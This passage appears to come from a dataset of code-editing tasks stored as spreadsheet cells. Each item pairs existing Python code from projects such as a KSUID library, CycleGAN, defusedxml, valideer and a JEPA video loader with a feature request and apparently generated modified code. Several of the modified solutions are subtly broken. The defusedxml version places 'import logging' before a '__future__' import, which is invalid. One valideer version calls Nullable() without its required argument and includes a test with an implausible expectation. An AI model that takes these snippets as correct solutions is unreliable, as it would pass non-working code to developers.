toBase62(self):\n        return encodebytes(self.bytes())\n\n    @staticmethod\n    def fromBase62(data):\n        v = decodebytes(data)\n        return ksuid.fromBytes(v)\n\n    def __str__(self):\n        if sys.version_info[0] &gt;= 3:\n            return "".join(list(map(lambda x: format(x, "02x"), self.__uid)))\n        return "".join(x.encode("hex") for x in self.__uid)', 'test_ksuid_serialization_support.py': '#Modify\ndef test_successfully_converts_to_base62_and_vice_versa():\n    uid1 = ksuid(timestamp=1609459200)  # Example timestamp for January 1, 2021\n    serialized = uid1.toBase62()\n    uid2 = ksuid.fromBase62(serialized)\n    assert str(uid1) == str(uid2)\n    assert uid1.bytes() == uid2.bytes()\n    assert uid1.toBytes() == uid2.toBytes()\n    assert uid1.toBase62() == uid2.toBase62()\n\n#New\ndef test_ksuid_with_specific_timestamp():\n    specific_timestamp = 1609459200  # Example timestamp for January 1, 2021\n    uid = ksuid(timestamp=specific_timestamp)\n    assert uid.getTimestamp() == specific_timestamp\n    assert uid.getDatetime() == datetime.datetime.fromtimestamp(specific_timestamp)', 'test_measure_1s_and_compare_ksuids.py': '#Modify\ndef test_measure_1s_and_compare_ksuids():\n    DELAY_INTERVAL_SECS = 1\n    u1 = ksuid(timestamp=time.time())\n    time.sleep(DELAY_INTERVAL_SECS)\n    u2 = ksuid(timestamp=time.time())\n    assert u1.toBase62() &lt; u2.toBase62()\n    assert u2.getTimestamp() &gt; u1.getTimestamp()\n    assert (u2.getTimestamp() - u1.getTimestamp()) &gt;= 1\n    d2 = u2.getDatetime()\n    d1 = u1.getDatetime()\n    assert d2 &gt; d1\n    assert (d2 - d1).total_seconds() &gt;= 1\n    assert u1.getPayload() != u2.getPayload()'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def save_training_images(self, sess, epoch):\n    if not os.path.exists("./output/imgs"):\n        os.makedirs("./output/imgs")\n    for i in range(0,10):\n        fake_A_temp, fake_B_temp, cyc_A_temp, cyc_B_temp = sess.run([self.fake_A, self.fake_B, self.cyc_A, self.cyc_B],feed_dict={self.input_A:self.A_input[i], self.input_B:self.B_input[i]})\n        imsave("./output/imgs/fakeB_"+ str(epoch) + "_" + str(i)+".jpg",((fake_A_temp[0]+1)*127.5).astype(np.uint8))\n        imsave("./output/imgs/fakeA_"+ str(epoch) + "_" + str(i)+".jpg",((fake_B_temp[0]+1)*127.5).astype(np.uint8))\n        imsave("./output/imgs/cycA_"+ str(epoch) + "_" + str(i)+".jpg",((cyc_A_temp[0]+1)*127.5).astype(np.uint8))\n        imsave("./output/imgs/cycB_"+ str(epoch) + "_" + str(i)+".jpg",((cyc_B_temp[0]+1)*127.5).astype(np.uint8))\n        imsave("./output/imgs/inputA_"+ str(epoch) + "_" + str(i)+".jpg",((self.A_input[i][0]+1)*127.5).astype(np.uint8))\n        imsave("./output/imgs/inputB_"+ str(epoch) + "_" + str(i)+".jpg",((self.B_input[i][0]+1)*127.5).astype(np.uint8))', 'invoking_code_segment': 'if(save_training_images):\n    self.save_training_images(sess, epoch)', 'feature_description': 'Add a feature to save the generated images at every 10 epochs during training instead of every epoch. This reduces disk I/O and storage requirements while still maintaining periodic checkpoints of the training progress.', 'modified_complete_code': '# CycleGAN/main.py - Modified train() method\n\ndef train(self):\n    \'\'\' Training Function \'\'\'\n    # Load Dataset from the dataset folder\n    self.input_setup()  \n    #Build the network\n    self.model_setup()\n    #Loss function calculations\n    self.loss_calc()\n    # Initializing the global variables\n    init = tf.global_variables_initializer()\n    saver = tf.train.Saver()     \n    with tf.Session() as sess:\n        sess.run(init)\n        #Read input to nd array\n        self.input_read(sess)\n        #Restore the model to run the model from last checkpoint\n        if to_restore:\n            chkpt_fname = tf.train.latest_checkpoint(check_dir)\n            saver.restore(sess, chkpt_fname)\n        writer = tf.summary.FileWriter("./output/2")\n        if not os.path.exists(check_dir):\n            os.makedirs(check_dir)\n        # Training Loop\n        for epoch in range(sess.run(self.global_step),100):                \n            print ("In the epoch ", epoch)\n            saver.save(sess,os.path.join(check_dir,"cyclegan"),global_step=epoch)\n            # Dealing with the learning rate as per the epoch number\n            if(epoch &lt; 100) :\n                curr_lr = 0.0002\n            else:\n                curr_lr = 0.0002 - 0.0002*(epoch-100)/100\n            #Modify: Save training images only at every 10 epochs\n            if(save_training_images and epoch % 10 == 0):\n                self.save_training_images(sess, epoch)\n            # sys.exit()\n            for ptr in range(0,max_images):\n                print("In the iteration ",ptr)\n                print("Starting",time.time()*1000.0)\n                # Optimizing the G_A network\n                _, fake_B_temp, summary_str = sess.run([self.g_A_trainer, self.fake_B, self.g_A_loss_summ],feed_dict={self.input_A:self.A_input[ptr], self.input_B:self.B_input[ptr], self.lr:curr_lr})\n                writer.add_summary(summary_str, epoch*max_images + ptr)                    \n                fake_B_temp1 = self.fake_image_pool(self.num_fake_inputs, fake_B_temp, self.fake_images_B)\n                # Optimizing the D_B network\n                _, summary_str = sess.run([self.d_B_trainer, self.d_B_loss_summ],feed_dict={self.input_A:self.A_input[ptr], self.input_B:self.B_input[ptr], self.lr:curr_lr, self.fake_pool_B:fake_B_temp1})\n                writer.add_summary(summary_str, epoch*max_images + ptr)\n                # Optimizing the G_B network\n                _, fake_A_temp, summary_str = sess.run([self.g_B_trainer, self.fake_A, self.g_B_loss_summ],feed_dict={self.input_A:self.A_input[ptr], self.input_B:self.B_input[ptr], self.lr:curr_lr})\n                writer.add_summary(summary_str, epoch*max_images + ptr)\n                fake_A_temp1 = self.fake_image_pool(self.num_fake_inputs, fake_A_temp, self.fake_images_A)\n                # Optimizing the D_A network\n                _, summary_str = sess.run([self.d_A_trainer, self.d_A_loss_summ],feed_dict={self.input_A:self.A_input[ptr], self.input_B:self.B_input[ptr], self.lr:curr_lr, self.fake_pool_A:fake_A_temp1})\n                writer.add_summary(summary_str, epoch*max_images + ptr)\n                self.num_fake_inputs+=1\n            sess.run(tf.assign(self.global_step, epoch + 1))\n        writer.add_graph(sess.graph)'}</t>
  </si>
  <si>
    <t>{'file_1': 'def build_generator_resnet_9blocks(inputgen, name="generator"):\n    with tf.variable_scope(name):\n        f = 7\n        ks = 3\n        pad_input = tf.pad(inputgen,[[0, 0], [ks, ks], [ks, ks], [0, 0]], "REFLECT")\n        o_c1 = general_conv2d(pad_input, ngf, f, f, 1, 1, 0.02,name="c1")\n        o_c2 = general_conv2d(o_c1, ngf*2, ks, ks, 2, 2, 0.02,"SAME","c2")\n        o_c3 = general_conv2d(o_c2, ngf*4, ks, ks, 2, 2, 0.02,"SAME","c3")\n        o_r1 = build_resnet_block(o_c3, ngf*4, "r1")\n        o_r2 = build_resnet_block(o_r1, ngf*4, "r2")\n        o_r3 = build_resnet_block(o_r2, ngf*4, "r3")\n        o_r4 = build_resnet_block(o_r3, ngf*4, "r4")\n        o_r5 = build_resnet_block(o_r4, ngf*4, "r5")\n        o_r6 = build_resnet_block(o_r5, ngf*4, "r6")\n        o_r7 = build_resnet_block(o_r6, ngf*4, "r7")\n        o_r8 = build_resnet_block(o_r7, ngf*4, "r8")\n        o_r9 = build_resnet_block(o_r8, ngf*4, "r9")\n        o_c4 = general_deconv2d(o_r9, [batch_size,128,128,ngf*2], ngf*2, ks, ks, 2, 2, 0.02,"SAME","c4")\n        o_c5 = general_deconv2d(o_c4, [batch_size,256,256,ngf], ngf, ks, ks, 2, 2, 0.02,"SAME","c5")\n        o_c6 = general_conv2d(o_c5, img_layer, f, f, 1, 1, 0.02,"SAME","c6",do_relu=False)\n        out_gen = tf.nn.tanh(o_c6,"t1")\n        return out_gen', 'file_2': 'self.fake_B = build_generator_resnet_9blocks(self.input_A, name="g_A")\nself.fake_A = build_generator_resnet_9blocks(self.input_B, name="g_B")', 'file_3': 'def train(self):\n    self.input_setup()\n    self.model_setup()\n    self.loss_calc()\n    init = tf.global_variables_initializer()\n    saver = tf.train.Saver()\n    with tf.Session() as sess:\n        sess.run(init)\n        self.input_read(sess)\n        if to_restore:\n            chkpt_fname = tf.train.latest_checkpoint(check_dir)\n            saver.restore(sess, chkpt_fname)\n        writer = tf.summary.FileWriter("./output/2")\n        if not os.path.exists(check_dir):\n            os.makedirs(check_dir)\n        for epoch in range(sess.run(self.global_step),100):\n            print ("In the epoch ", epoch)\n            saver.save(sess,os.path.join(check_dir,"cyclegan"),global_step=epoch)\n            if(epoch &lt; 100) :\n                curr_lr = 0.0002\n            else:\n                curr_lr = 0.0002 - 0.0002*(epoch-100)/100\n            #Modify\n            if epoch % 10 == 0:\n                self.save_training_images(sess, epoch)\n            for ptr in range(0,max_images):\n                _, fake_B_temp, summary_str = sess.run([self.g_A_trainer, self.fake_B, self.g_A_loss_summ],feed_dict={self.input_A:self.A_input[ptr], self.input_B:self.B_input[ptr], self.lr:curr_lr})\n                writer.add_summary(summary_str, epoch*max_images + ptr)\n                fake_B_temp1 = self.fake_image_pool(self.num_fake_inputs, fake_B_temp, self.fake_images_B)\n                _, summary_str = sess.run([self.d_B_trainer, self.d_B_loss_summ],feed_dict={self.input_A:self.A_input[ptr], self.input_B:self.B_input[ptr], self.lr:curr_lr, self.fake_pool_B:fake_B_temp1})\n                writer.add_summary(summary_str, epoch*max_images + ptr)\n                _, fake_A_temp, summary_str = sess.run([self.g_B_trainer, self.fake_A, self.g_B_loss_summ],feed_dict={self.input_A:self.A_input[ptr], self.input_B:self.B_input[ptr], self.lr:curr_lr})\n                writer.add_summary(summary_str, epoch*max_images + ptr)\n                fake_A_temp1 = self.fake_image_pool(self.num_fake_inputs, fake_A_temp, self.fake_images_A)\n                _, summary_str = sess.run([self.d_A_trainer, self.d_A_loss_summ],feed_dict={self.input_A:self.A_input[ptr], self.input_B:self.B_input[ptr], self.lr:curr_lr, self.fake_pool_A:fake_A_temp1})\n                writer.add_summary(summary_str, epoch*max_images + ptr)\n                self.num_fake_inputs+=1\n            sess.run(tf.assign(self.global_step, epoch + 1))\n        writer.add_graph(sess.graph)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class DefusedExpatParser(_ExpatParser):\n    def __init__(self, namespaceHandling=0, bufsize=2**16 - 20, forbid_dtd=False, forbid_entities=True, forbid_external=True):\n        super().__init__(namespaceHandling, bufsize)\n        self.forbid_dtd = forbid_dtd\n        self.forbid_entities = forbid_entities\n        self.forbid_external = forbid_external\n    \n    def reset(self):\n        super().reset()\n        parser = self._parser\n        if self.forbid_dtd:\n            parser.StartDoctypeDeclHandler = self.defused_start_doctype_decl\n        if self.forbid_entities:\n            parser.EntityDeclHandler = self.defused_entity_decl\n            parser.UnparsedEntityDeclHandler = self.defused_unparsed_entity_decl\n        if self.forbid_external:\n            parser.ExternalEntityRefHandler = self.defused_external_entity_ref_handler', 'invoking_code_segment': 'class TestDefusedMinidomWithParser(TestDefusedMinidom):\n    def parse(self, xmlfile, **kwargs):\n        doc = self.module.parse(xmlfile, parser=expatreader.create_parser(**kwargs), **kwargs)\n        return doc.toxml()\n    \n    def parseString(self, xmlstring, **kwargs):\n        doc = self.module.parseString(xmlstring, parser=expatreader.create_parser(**kwargs), **kwargs)\n        return doc.toxml()', 'feature_description': 'Add a new feature to log XML parsing events to a file. This includes tracking DTD declarations, entity declarations, and external entity references with timestamps and event details.', 'modified_complete_code': '# defusedxml/defusedxml/expatreader.py\n# #Modify: Add logging import\nimport logging\nfrom __future__ import print_function, absolute_import\nfrom xml.sax.expatreader import ExpatParser as _ExpatParser\nfrom .common import DTDForbidden, EntitiesForbidden, ExternalReferenceForbidden\n\n__origin__ = "xml.sax.expatreader"\n\n# #New: Configure logging for XML parsing events\nlogger = logging.getLogger(\'defusedxml.expatreader\')\n\nclass DefusedExpatParser(_ExpatParser):\n    """Defused SAX driver for the pyexpat C module."""\n\n    def __init__(\n        self,\n        namespaceHandling=0,\n        bufsize=2**16 - 20,\n        forbid_dtd=False,\n        forbid_entities=True,\n        forbid_external=True,\n        log_file=None,  # #New: Add log_file parameter\n    ):\n        super().__init__(namespaceHandling, bufsize)\n        self.forbid_dtd = forbid_dtd\n        self.forbid_entities = forbid_entities\n        self.forbid_external = forbid_external\n        self.log_file = log_file  # #New: Store log file path\n        # #New: Setup file logging if log_file is provided\n        if self.log_file:\n            file_handler = logging.FileHandler(self.log_file, mode=\'a\')\n            file_handler.setLevel(logging.INFO)\n            formatter = logging.Formatter(\'%(asctime)s - %(name)s - %(levelname)s - %(message)s\')\n            file_handler.setFormatter(formatter)\n            logger.addHandler(file_handler)\n            logger.setLevel(logging.INFO)\n\n    def defused_start_doctype_decl(self, name, sysid, pubid, has_internal_subset):\n        # #New: Log DTD declaration event\n        logger.info(f"DTD Declaration detected: name={name}, sysid={sysid}, pubid={pubid}")\n        raise DTDForbidden(name, sysid, pubid)\n\n    def defused_entity_decl(\n        self, name, is_parameter_entity, value, base, sysid, pubid, notation_name\n    ):\n        # #New: Log entity declaration event\n        logger.info(f"Entity Declaration detected: name={name}, is_parameter={is_parameter_entity}, sysid={sysid}, pubid={pubid}")\n        raise EntitiesForbidden(name, value, base, sysid, pubid, notation_name)\n\n    def defused_unparsed_entity_decl(self, name, base, sysid, pubid, notation_name):\n        # #New: Log unparsed entity declaration event\n        logger.info(f"Unparsed Entity Declaration detected: name={name}, sysid={sysid}, pubid={pubid}")\n        raise EntitiesForbidden(name, None, base, sysid, pubid, notation_name)\n\n    def defused_external_entity_ref_handler(self, context, base, sysid, pubid):\n        # #New: Log external entity reference event\n        logger.info(f"External Entity Reference detected: context={context}, base={base}, sysid={sysid}, pubid={pubid}")\n        raise ExternalReferenceForbidden(context, base, sysid, pubid)\n\n    def reset(self):\n        super().reset()\n        parser = self._parser\n        if self.forbid_dtd:\n            parser.StartDoctypeDeclHandler = self.defused_start_doctype_decl\n        if self.forbid_entities:\n            parser.EntityDeclHandler = self.defused_entity_decl\n            parser.UnparsedEntityDeclHandler = self.defused_unparsed_entity_decl\n        if self.forbid_external:\n            parser.ExternalEntityRefHandler = self.defused_external_entity_ref_handler\n\ndef create_parser(*args, **kwargs):\n    return DefusedExpatParser(*args, **kwargs)\n\n# defusedxml/tests.py\n# #Modify: Update test class to use logging feature\nclass TestDefusedMinidomWithParser(TestDefusedMinidom):\n    cyclic_error = SAXParseException\n    dtd_external_ref = True\n    # #New: Add log file path for testing\n    log_file = os.path.join(HERE, \'xml_parsing_events.log\')\n\n    def parse(self, xmlfile, **kwargs):\n        # #Modify: Pass log_file to create_parser\n        doc = self.module.parse(xmlfile, parser=expatreader.create_parser(log_file=self.log_file, **kwargs), **kwargs)\n        return doc.toxml()\n\n    def parseString(self, xmlstring, **kwargs):\n        # #Modify: Pass log_file to create_parser\n        doc = self.module.parseString(\n            xmlstring, parser=expatreader.create_parser(log_file=self.log_file, **kwargs), **kwargs\n        )\n        return doc.toxml()\n    \n    # #New: Add cleanup method to remove log file after tests\n    def tearDown(self):\n        if os.path.exists(self.log_file):\n            os.remove(self.log_file)'}</t>
  </si>
  <si>
    <t>{'#file 1': "class DefusedExpatParser(_ExpatParser):\n    def __init__(self, namespaceHandling=0, bufsize=2**16 - 20, forbid_dtd=False, forbid_entities=True, forbid_external=True, log_file=None):\n        super().__init__(namespaceHandling, bufsize)\n        self.forbid_dtd = forbid_dtd\n        self.forbid_entities = forbid_entities\n        self.forbid_external = forbid_external\n        self.log_file = log_file\n        if self.log_file:\n            self.log_file = open(log_file, 'w')\n\n    def log_event(self, event):\n        if self.log_file:\n            self.log_file.write(event + '\\n')\n\n    def defused_start_doctype_decl(self, name, sysid, pubid, has_internal_subset):\n        self.log_event(f'Start Doctype: {name}, {sysid}, {pubid}')\n        raise DTDForbidden(name, sysid, pubid)\n\n    def defused_entity_decl(self, name, is_parameter_entity, value, base, sysid, pubid, notation_name):\n        self.log_event(f'Entity Decl: {name}, {sysid}, {pubid}')\n        raise EntitiesForbidden(name, value, base, sysid, pubid, notation_name)\n\n    def defused_unparsed_entity_decl(self, name, base, sysid, pubid, notation_name):\n        self.log_event(f'Unparsed Entity Decl: {name}, {sysid}, {pubid}')\n        raise EntitiesForbidden(name, None, base, sysid, pubid, notation_name)\n\n    def defused_external_entity_ref_handler(self, context, base, sysid, pubid):\n        self.log_event(f'External Entity Ref: {sysid}, {pubid}')\n        raise ExternalReferenceForbidden(context, base, sysid, pubid)\n\n    def reset(self):\n        super().reset()\n        parser = self._parser\n        if self.forbid_dtd:\n            parser.StartDoctypeDeclHandler = self.defused_start_doctype_decl\n        if self.forbid_entities:\n            parser.EntityDeclHandler = self.defused_entity_decl\n            parser.UnparsedEntityDeclHandler = self.defused_unparsed_entity_decl\n        if self.forbid_external:\n            parser.ExternalEntityRefHandler = self.defused_external_entity_ref_handler\n\n    def close(self):\n        if self.log_file:\n            self.log_file.close()", '#file 2': "def create_parser(*args, **kwargs):\n    log_file = kwargs.pop('log_file', None)\n    return DefusedExpatParser(*args, log_file=log_file, **kwargs)", '#file 3': "def parse(self, xmlfile, **kwargs):\n    log_file = kwargs.pop('log_file', None)\n    doc = self.module.parse(xmlfile, parser=expatreader.create_parser(log_file=log_file, **kwargs), **kwargs)\n    return doc.toxml()\n\ndef parseString(self, xmlstring, **kwargs):\n    log_file = kwargs.pop('log_file', None)\n    doc = self.module.parseString(xmlstring, parser=expatreader.create_parser(log_file=log_file, **kwargs), **kwargs)\n    return doc.toxml()"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class Nullable(Validator):\n    def __init__(self, schema, default=None):\n        if isinstance(schema, Validator):\n            self._validator = schema\n        else:\n            validator = parse(schema)\n            if isinstance(validator, (Nullable, NonNullable)):\n                validator = validator._validator\n            self._validator = validator\n        self._default = default\n\n    def validate(self, value, adapt=True):\n        if value is None:\n            return self.default\n        return self._validator.validate(value, adapt)\n\n    @property\n    def default(self):\n        default = self._default\n        return default if not callable(default) else default()\n\n    @property\n    def default_object_property(self):\n        default = self.default\n        return default if default is not None else self._UNDEFINED', 'invoking_code_segment': 'class Object(Type):\n    def validate(self, value, adapt=True):\n        super(Object, self).validate(value)\n        missing_required = self._required_keys.difference(value)\n        if missing_required:\n            raise ValidationError("missing required properties: %s" %\n                                  list(missing_required), value)\n\n        result = value.copy() if adapt else None\n        for name, validator in self._named_validators:\n            if name in value:\n                try:\n                    adapted = validator.validate(value[name], adapt)\n                    if result is not None:\n                        result[name] = adapted\n                except ValidationError as ex:\n                    if (not self._ignore_optional_errors\n                        or name in self._required_keys):\n                        raise ex.add_context(name)\n                    elif result is not None:\n                        del result[name]\n                    else:\n                        pass\n            elif result is not None and isinstance(validator, Nullable):\n                default = validator.default_object_property\n                if default is not Nullable._UNDEFINED:\n                    result[name] = default', 'feature_description': 'Add a new feature to allow Nullable validators to handle default values for nested objects. This enhancement enables Nullable validators to properly initialize nested object structures with their default values when properties are missing, supporting both simple defaults and callable factories for complex nested objects.', 'modified_complete_code': '# File 1: valideer/valideer/validators.py - Modified Nullable class\n\nclass Nullable(Validator):\n    """A validator that also accepts ``None``.\n\n    ``None`` is adapted to ``default``. ``default`` can also be a zero-argument\n    callable, in which case ``None`` is adapted to ``default()``.\n\n    The :py:class:`Object` validator sets the value of missing properties with\n    :py:class:`Nullable` schema to the respective ``default`` if and only if\n    the ``default`` is not ``None``. If a different behaviour is desired (e.g.\n    to always set the value to ``default`` even when it is ``None``), you can\n    subclass :py:class:`Nullable`` and override the :py:meth:`default_object_property`\n    property.\n    \n    #New: Enhanced to support nested object defaults through callable factories\n    """\n\n    _UNDEFINED = object()\n\n    def __init__(self, schema, default=None):\n        if isinstance(schema, Validator):\n            self._validator = schema\n        else:\n            validator = parse(schema)\n            if isinstance(validator, (Nullable, NonNullable)):\n                validator = validator._validator\n            self._validator = validator\n        self._default = default\n        #New: Track if this Nullable wraps a nested object validator\n        self._is_nested_object = isinstance(self._validator, Object)\n\n    def validate(self, value, adapt=True):\n        if value is None:\n            return self.default\n        return self._validator.validate(value, adapt)\n\n    @property\n    def default(self):\n        default = self._default\n        return default if not callable(default) else default()\n\n    @property\n    def default_object_property(self):\n        """#Modify: Enhanced to handle nested object defaults"""\n        default = self.default\n        #New: For nested objects, return the default even if it\'s None to allow\n        # proper initialization of nested structures\n        if self._is_nested_object and default is not None:\n            return default\n        return default if default is not None else self._UNDEFINED\n\n    @property\n    def humanized_name(self):\n        return "%s or null" % self._validator.humanized_name\n\n\n# File 2: valideer/valideer/validators.py - Modified Object class validate method\n\nclass Object(Type):\n    """A validator that accepts json-like objects.\n\n    A ``json-like object`` here is meant as a dict with a predefined set of\n    "properties", i.e. string keys.\n    """\n\n    accept_types = collections.Mapping\n\n    REQUIRED_PROPERTIES = False\n    ADDITIONAL_PROPERTIES = True\n    IGNORE_OPTIONAL_PROPERTY_ERRORS = False\n    REMOVE = object()\n\n    def __init__(self, optional={}, required={}, additional=None,\n                 ignore_optional_errors=None):\n        """Instantiate an Object validator.\n\n        :param optional: The schema of optional properties, specified as a\n            ``{name: schema}`` dict.\n        :param required: The schema of required properties, specified as a\n            ``{name: schema}`` dict.\n        :param additional: The schema of all properties that are not explicitly\n            defined as ``optional`` or ``required``. It can also be:\n\n            - ``True`` to allow any value for additional properties.\n            - ``False`` to disallow any additional properties.\n            - :py:attr:`REMOVE` to remove any additional properties from the\n              adapted object.\n            - ``None`` to use the value of the ``ADDITIONAL_PROPERTIES`` class\n              attribute.\n        :param ignore_optional_errors: Determines if invalid optional properties\n            are ignored:\n\n            - ``True`` invalid optional properties are ignored.\n            - ``False`` invalid optional properties raise ValidationError.\n            - ``None`` use the value of the ``IGNORE_OPTIONAL_PROPERTY_ERRORS``\n              class attribute.\n        """\n        super(Object, self).__init__()\n        if additional is None:\n            additional = self.ADDITIONAL_PROPERTIES\n        if ignore_optional_errors is None:\n            ignore_optional_errors = self.IGNORE_OPTIONAL_PROPERTY_ERRORS\n        if not isinstance(additional, bool) and additional is not self.REMOVE:\n            additional = parse(additional)\n        self._named_validators = [\n            (name, parse(schema))\n            for name, schema in iteritems(dict(optional, **required))\n        ]\n        self._required_keys = set(required)\n        self._all_keys = set(name for name, _ in self._named_validators)\n        self._additional = additional\n        self._ignore_optional_errors = ignore_optional_errors\n\n    def validate(self, value, adapt=True):\n        """#Modify: Enhanced to properly handle Nullable validators with nested object defaults"""\n        super(Object, self).validate(value)\n        missing_required = self._required_keys.difference(value)\n        if missing_required:\n            raise ValidationError("missing required properties: %s" %\n                                  list(missing_required), value)\n\n        result = value.copy() if adapt else None\n        for name, validator in self._named_validators:\n            if name in value:\n                try:\n                    adapted = validator.validate(value[name], adapt)\n                    if result is not None:\n                        result[name] = adapted\n                except ValidationError as ex:\n                    if (not self._ignore_optional_errors\n                        or name in self._required_keys):\n                        raise ex.add_context(name)\n                    elif result is not None:\n                        del result[name]\n                    else:\n                        pass\n            elif result is not None and isinstance(validator, Nullable):\n                #Modify: Enhanced logic to handle nested object defaults\n                default = validator.default_object_property\n                if default is not Nullable._UNDEFINED:\n                    #New: If default is a dict (nested object), validate and adapt it\n                    if isinstance(default, dict) and isinstance(validator._validator, Object):\n                        try:\n                            adapted_default = validator._validator.validate(default, adapt=adapt)\n                            result[name] = adapted_default\n                        except ValidationError:\n                            # If nested object validation fails, use raw default\n                            result[name] = default\n                    else:\n                        result[name] = default\n\n        if self._additional is not True:\n            all_keys = self._all_keys\n            additional_properties = [k for k in value if k not in all_keys]\n            if additional_properties:\n                if self._additional is False:\n                    raise ValidationError("additional properties: %s" %\n                                          additional_properties, value)\n                elif self._additional is self.REMOVE:\n                    if result is not None:\n                        for name in additional_properties:\n                            del result[name]\n                else:\n                    additional_validate = self._additional.validate\n                    for name in additional_properties:\n                        try:\n                            adapted = additional_validate(value[name], adapt)\n                            if result is not None:\n                                result[name] = adapted\n                        except ValidationError as ex:\n                            raise ex.add_context(name)\n\n        return result'}</t>
  </si>
  <si>
    <t>{'#file 1': 'class Nullable(Validator):\n    _UNDEFINED = object()\n\n    def __init__(self, schema, default=None):\n        if isinstance(schema, Validator):\n            self._validator = schema\n        else:\n            validator = parse(schema)\n            if isinstance(validator, (Nullable, NonNullable)):\n                validator = validator._validator\n            self._validator = validator\n        self._default = default\n\n    def validate(self, value, adapt=True):\n        if value is None:\n            return self.default\n        return self._validator.validate(value, adapt)\n\n    @property\n    def default(self):\n        default = self._default\n        return default if not callable(default) else default()\n\n    @property\n    def default_object_property(self):\n        default = self.default\n        return default if default is not None else self._UNDEFINED\n\n    @property\n    def humanized_name(self):\n        return "%s or null" % self._validator.humanized_name\n\n    #Modify\n    def apply_default_to_nested(self, value):\n        if isinstance(value, collections.Mapping):\n            for key, val in value.items():\n                if isinstance(val, Nullable):\n                    value[key] = val.apply_default_to_nested(val)\n        return value', '#file 2': 'class Object(Type):\n    accept_types = collections.Mapping\n\n    REQUIRED_PROPERTIES = False\n    ADDITIONAL_PROPERTIES = True\n    IGNORE_OPTIONAL_PROPERTY_ERRORS = False\n    REMOVE = object()\n\n    def __init__(self, optional={}, required={}, additional=None,\n                 ignore_optional_errors=None):\n        super(Object, self).__init__()\n        if additional is None:\n            additional = self.ADDITIONAL_PROPERTIES\n        if ignore_optional_errors is None:\n            ignore_optional_errors = self.IGNORE_OPTIONAL_PROPERTY_ERRORS\n        if not isinstance(additional, bool) and additional is not self.REMOVE:\n            additional = parse(additional)\n        self._named_validators = [\n            (name, parse(schema))\n            for name, schema in iteritems(dict(optional, **required))\n        ]\n        self._required_keys = set(required)\n        self._all_keys = set(name for name, _ in self._named_validators)\n        self._additional = additional\n        self._ignore_optional_errors = ignore_optional_errors\n\n    def validate(self, value, adapt=True):\n        super(Object, self).validate(value)\n        missing_required = self._required_keys.difference(value)\n        if missing_required:\n            raise ValidationError("missing required properties: %s" %\n                                  list(missing_required), value)\n\n        result = value.copy() if adapt else None\n        for name, validator in self._named_validators:\n            if name in value:\n                try:\n                    adapted = validator.validate(value[name], adapt)\n                    if result is not None:\n                        result[name] = adapted\n                except ValidationError as ex:\n                    if (not self._ignore_optional_errors\n                        or name in self._required_keys):\n                        raise ex.add_context(name)\n                    elif result is not None:\n                        del result[name]\n                    else:\n                        pass\n            elif result is not None and isinstance(validator, Nullable):\n                default = validator.default_object_property\n                if default is not Nullable._UNDEFINED:\n                    result[name] = default\n        #Modify\n        if adapt:\n            result = Nullable().apply_default_to_nested(result)\n        return result', '#file 3': 'class TestValidator(unittest.TestCase):\n\n    parse = staticmethod(V.parse)\n\n    def setUp(self):\n        V.Object.REQUIRED_PROPERTIES = True\n        V.base.reset_type_names()\n        self.complex_validator = self.parse({\n            "n": "number",\n            "?i": V.Nullable("integer", 0),\n            "?b": bool,\n            "?e": V.Enum(["r", "g", "b"]),\n            "?d": V.AnyOf("date", "datetime"),\n            "?s": V.String(min_length=1, max_length=8),\n            "?p": V.Nullable(re.compile(r"\\d{1,4}$")),\n            "?l": [{"+s2": "string"}],\n            "?t": (unicode, "number"),\n            "?h": V.Mapping(int, ["string"]),\n            "?o": V.NonNullable({"+i2": "integer"}),\n        })\n\n    def test_nullable_with_default_object_property(self):\n        class ObjectNullable(V.Nullable):\n            default_object_property = property(lambda self: self.default)\n\n        regular_nullables = [\n            "?integer",\n            V.Nullable("integer"),\n            V.Nullable("integer", None),\n            V.Nullable("integer", default=None),\n            V.Nullable("integer", lambda: None),\n            V.Nullable("integer", default=lambda: None)\n        ]\n        for obj in regular_nullables:\n            self._testValidation({"?foo": obj}, adapted=[({}, {})])\n\n        object_nullables = [\n            ObjectNullable("integer"),\n            ObjectNullable("integer", None),\n            ObjectNullable("integer", default=None),\n            ObjectNullable("integer", lambda: None),\n            ObjectNullable("integer", default=lambda: None),\n        ]\n        for obj in object_nullables:\n            self._testValidation({"?foo": obj}, adapted=[({}, {"foo": None})])\n\n    #New\n    def test_nullable_with_nested_default_object_property(self):\n        class NestedObjectNullable(V.Nullable):\n            default_object_property = property(lambda self: self.default)\n\n        nested_nullables = [\n            NestedObjectNullable({"+foo": "integer"}),\n            NestedObjectNullable({"+foo": "integer"}, None),\n            NestedObjectNullable({"+foo": "integer"}, default=None),\n            NestedObjectNullable({"+foo": "integer"}, lambda: None),\n            NestedObjectNullable({"+foo": "integer"}, default=lambda: None),\n        ]\n        for obj in nested_nullables:\n            self._testValidation({"?nested": obj}, adapted=[({}, {"nested": {"foo": None}})])'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'make_videodataset() function in jepa/src/datasets/video_dataset.py', 'invoking_code_segment': 'init_data() function in jepa/src/datasets/data_manager.py that calls make_videodataset()', 'feature_description': 'Add support for mixed precision training with FP16 by introducing a use_fp16 parameter to the video dataset creation pipeline. This allows the data loader to be configured for mixed precision training, enabling automatic casting of video data to FP16 format when needed.', 'modified_complete_code': '# FILE 1: jepa/src/datasets/video_dataset.py\n\ndef make_videodataset(\n    data_paths,\n    batch_size,\n    frames_per_clip=8,\n    frame_step=4,\n    num_clips=1,\n    random_clip_sampling=True,\n    allow_clip_overlap=False,\n    filter_short_videos=False,\n    filter_long_videos=int(10**9),\n    transform=None,\n    shared_transform=None,\n    rank=0,\n    world_size=1,\n    datasets_weights=None,\n    collator=None,\n    drop_last=True,\n    num_workers=10,\n    pin_mem=True,\n    duration=None,\n    log_dir=None,\n    use_fp16=False,  # #New: Add FP16 support parameter\n):\n    dataset = VideoDataset(\n        data_paths=data_paths,\n        datasets_weights=datasets_weights,\n        frames_per_clip=frames_per_clip,\n        frame_step=frame_step,\n        num_clips=num_clips,\n        random_clip_sampling=random_clip_sampling,\n        allow_clip_overlap=allow_clip_overlap,\n        filter_short_videos=filter_short_videos,\n        filter_long_videos=filter_long_videos,\n        duration=duration,\n        shared_transform=shared_transform,\n        transform=transform,\n        use_fp16=use_fp16)  # #New: Pass FP16 flag to dataset\n\n    logger.info(\'VideoDataset dataset created\')\n    if datasets_weights is not None:\n        dist_sampler = DistributedWeightedSampler(\n            dataset.sample_weights,\n            num_replicas=world_size,\n   